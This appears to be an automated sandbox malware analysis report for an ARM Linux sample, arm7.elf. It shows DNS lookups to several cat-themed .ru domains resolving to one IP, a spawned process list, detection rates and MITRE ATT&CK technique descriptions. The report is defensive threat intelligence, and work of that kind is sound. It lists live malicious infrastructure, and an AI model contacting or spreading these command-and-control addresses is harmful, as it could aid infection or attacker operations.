Feb 10, 2025 20:08:41.848761082 CET	53	59300	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:43.462158918 CET	41670	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:43.468369961 CET	53	41670	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:45.162412882 CET	37112	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:45.169121981 CET	53	37112	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:46.837702036 CET	32962	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:46.847106934 CET	53	32962	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:48.467775106 CET	54862	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:48.476653099 CET	53	54862	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:50.104736090 CET	45679	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:50.111069918 CET	53	45679	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:51.755821943 CET	42901	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:51.764293909 CET	53	42901	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:53.401406050 CET	59370	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:53.411726952 CET	53	59370	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:55.122273922 CET	56986	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:55.128417969 CET	53	56986	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:56.747792006 CET	45602	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:56.754288912 CET	53	45602	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:58.374424934 CET	44180	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:58.381762028 CET	53	44180	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:00.008244991 CET	59812	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:00.014446974 CET	53	59812	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:01.651818037 CET	58027	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:01.658516884 CET	53	58027	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:03.328649998 CET	60162	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:03.335027933 CET	53	60162	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:04.978286982 CET	51910	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:04.984705925 CET	53	51910	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:06.669265032 CET	47611	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:06.675707102 CET	53	47611	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:08.303044081 CET	49413	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:08.314093113 CET	53	49413	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:09.924148083 CET	58468	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:09.930677891 CET	53	58468	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:11.542336941 CET	48861	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:11.548909903 CET	53	48861	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:13.191000938 CET	57255	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:13.197333097 CET	53	57255	8.8.8.8	192.168.2.23
Feb 10, 2025 20:09:14.843849897 CET	42007	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:09:14.851130009 CET	53	42007	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 10, 2025 20:08:31.894284964 CET	192.168.2.23	8.8.8.8	0xb6a1	Standard query (0)	newkittler.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:08:33.554970026 CET	192.168.2.23	8.8.8.8	0x3695	Standard query (0)	polizei.su. [malformed]	256	433	false
Feb 10, 2025 20:08:35.244630098 CET	192.168.2.23	8.8.8.8	0x416e	Standard query (0)	kittlez.ru. [malformed]	256	435	false
Feb 10, 2025 20:08:36.883641958 CET	192.168.2.23	8.8.8.8	0x873	Standard query (0)	qittler.ru. [malformed]	256	436	false
Feb 10, 2025 20:08:38.528568029 CET	192.168.2.23	8.8.8.8	0xe32b	Standard query (0)	cuttiecats.ru. [malformed]	256	438	false
Feb 10, 2025 20:08:40.187525988 CET	192.168.2.23	8.8.8.8	0xa094	Standard query (0)	newkittler.ru. [malformed]	256	440	false
Feb 10, 2025 20:08:41.842446089 CET	192.168.2.23	8.8.8.8	0xaa80	Standard query (0)	cuttiecats.ru. [malformed]	256	441	false
Feb 10, 2025 20:08:43.462158918 CET	192.168.2.23	8.8.8.8	0xb8a3	Standard query (0)	cuttiecats.ru. [malformed]	256	443	false
Feb 10, 2025 20:08:45.162412882 CET	192.168.2.23	8.8.8.8	0x4856	Standard query (0)	gokittler.ru. [malformed]	256	445	false
Feb 10, 2025 20:08:46.837702036 CET	192.168.2.23	8.8.8.8	0xd6cb	Standard query (0)	cuttiecats.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:08:48.467775106 CET	192.168.2.23	8.8.8.8	0x2ab9	Standard query (0)	cats-master.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:08:50.104736090 CET	192.168.2.23	8.8.8.8	0x51b4	Standard query (0)	cuttiecats.ru. [malformed]	256	450	false
Feb 10, 2025 20:08:51.755821943 CET	192.168.2.23	8.8.8.8	0x7525	Standard query (0)	thekittler.ru. [malformed]	256	451	false
Feb 10, 2025 20:08:53.401406050 CET	192.168.2.23	8.8.8.8	0xe569	Standard query (0)	cats-master.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:08:55.122273922 CET	192.168.2.23	8.8.8.8	0x2f73	Standard query (0)	thekittler.ru. [malformed]	256	455	false
Feb 10, 2025 20:08:56.747792006 CET	192.168.2.23	8.8.8.8	0x53b1	Standard query (0)	gokittler.ru. [malformed]	256	456	false
Feb 10, 2025 20:08:58.374424934 CET	192.168.2.23	8.8.8.8	0xea73	Standard query (0)	cuttiecats.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:09:00.008244991 CET	192.168.2.23	8.8.8.8	0x3772	Standard query (0)	gokittler.ru. [malformed]	256	460	false
Feb 10, 2025 20:09:01.651818037 CET	192.168.2.23	8.8.8.8	0xb05f	Standard query (0)	newkittler.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:09:03.328649998 CET	192.168.2.23	8.8.8.8	0x4fa9	Standard query (0)	kittlerer.ru. [malformed]	256	463	false
Feb 10, 2025 20:09:04.978286982 CET	192.168.2.23	8.8.8.8	0xb912	Standard query (0)	qittler.ru. [malformed]	256	464	false
Feb 10, 2025 20:09:06.669265032 CET	192.168.2.23	8.8.8.8	0x8dc9	Standard query (0)	cuttiecats.ru. [malformed]	256	466	false
Feb 10, 2025 20:09:08.303044081 CET	192.168.2.23	8.8.8.8	0x1ab9	Standard query (0)	cat-are-here.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:09:09.924148083 CET	192.168.2.23	8.8.8.8	0x6963	Standard query (0)	kittlerer.ru. [malformed]	256	469	false
Feb 10, 2025 20:09:11.542336941 CET	192.168.2.23	8.8.8.8	0xd523	Standard query (0)	gokittler.ru. [malformed]	256	471	false
Feb 10, 2025 20:09:13.191000938 CET	192.168.2.23	8.8.8.8	0xdae4	Standard query (0)	qittler.ru. [malformed]	256	473	false
Feb 10, 2025 20:09:14.843849897 CET	192.168.2.23	8.8.8.8	0xef9d	Standard query (0)	newkittler.ru. [malformed]	256	474	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 10, 2025 20:08:31.904339075 CET	8.8.8.8	192.168.2.23	0xb6a1	No error (0)	newkittler.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:08:46.847106934 CET	8.8.8.8	192.168.2.23	0xd6cb	No error (0)	cuttiecats.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:08:48.476653099 CET	8.8.8.8	192.168.2.23	0x2ab9	No error (0)	cats-master.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:08:53.411726952 CET	8.8.8.8	192.168.2.23	0xe569	No error (0)	cats-master.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:08:58.381762028 CET	8.8.8.8	192.168.2.23	0xea73	No error (0)	cuttiecats.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:09:01.658516884 CET	8.8.8.8	192.168.2.23	0xb05f	No error (0)	newkittler.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:09:08.314093113 CET	8.8.8.8	192.168.2.23	0x1ab9	No error (0)	cat-are-here.ru	185.93.89.106	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: arm7.elf PID: 6231, Parent PID: 6156

General

Start time (UTC):	19:08:29
Start date (UTC):	10/02/2025
Path:	/tmp/arm7.elf
Arguments:	/tmp/arm7.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:08:29
Start date (UTC):	10/02/2025
Path:	/tmp/arm7.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:08:29
Start date (UTC):	10/02/2025
Path:	/tmp/arm7.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:08:30
Start date (UTC):	10/02/2025
Path:	/tmp/arm7.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:08:30
Start date (UTC):	10/02/2025
Path:	/tmp/arm7.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/bin/rm
Arguments:	rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfdesktop
Arguments:	xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
File size:	473520 bytes
MD5 hash:	dfb13e1581f80065dcea16f2476f16f2

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-panel
Arguments:	xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Start time (UTC):	19:08:31
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:32
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:32
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:32
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:32
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfwm4
Arguments:	xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
File size:	420424 bytes
MD5 hash:	59defa3c00cc30d85ed77b738d55e9da

Start time (UTC):	19:08:32
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:32
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfdesktop
Arguments:	xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
File size:	473520 bytes
MD5 hash:	dfb13e1581f80065dcea16f2476f16f2

Start time (UTC):	19:08:32
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:08:32
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-panel
Arguments:	xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Source: arm7.elf	Virustotal: Detection: 50%			Perma Link
Source: arm7.elf	ReversingLabs: Detection: 47%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
Tactics:	Credential Access
Data Sources:	Application Log: Application Log Content, Command: Command Execution, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report arm7.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Symbols

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: arm7.elf PID: 6231, Parent PID: 6156

General

Chronological Activities

Analysis Process: arm7.elf PID: 6233, Parent PID: 6231

General

Chronological Activities

Analysis Process: arm7.elf PID: 6235, Parent PID: 6233

General

Chronological Activities

Analysis Process: arm7.elf PID: 6239, Parent PID: 6233

General

Chronological Activities

Analysis Process: arm7.elf PID: 6240, Parent PID: 6233

General

Chronological Activities

Linux Analysis Report
arm7.elf